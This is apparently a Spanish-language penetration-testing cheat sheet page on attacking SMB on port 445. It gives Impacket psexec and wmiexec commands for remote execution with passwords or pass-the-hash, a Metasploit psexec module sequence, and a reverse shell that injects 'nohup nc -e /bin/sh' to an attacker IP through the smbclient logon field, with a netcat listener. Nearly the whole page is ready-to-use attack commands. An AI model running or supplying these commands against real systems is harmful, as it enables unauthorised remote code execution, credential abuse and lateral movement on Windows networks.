445/TCP (SMB)
SMB, Server Message Block.
Impacket
# impacket-psexec
psexec.py <user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash>
# impacket-wmiexec
wmiexec.py <user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash>
<user> = usuario.
<password> = contraseña.
<target> = dirección IP del objetivo.
<hash> =
LMHASH:NTHASH
Metasploit
use exploit/windows/smb/psexec
set RHOSTS <target>
set SMBUser <username>
set SMBPass <password>
run
Reverse shell
smbclient //<target>/tmp
logon "./=`nohup nc -e /bin/sh <attacker-IP-address> <listen-port>`"
nc -lvnp <listen-port>
Última actualización
¿Te fue útil?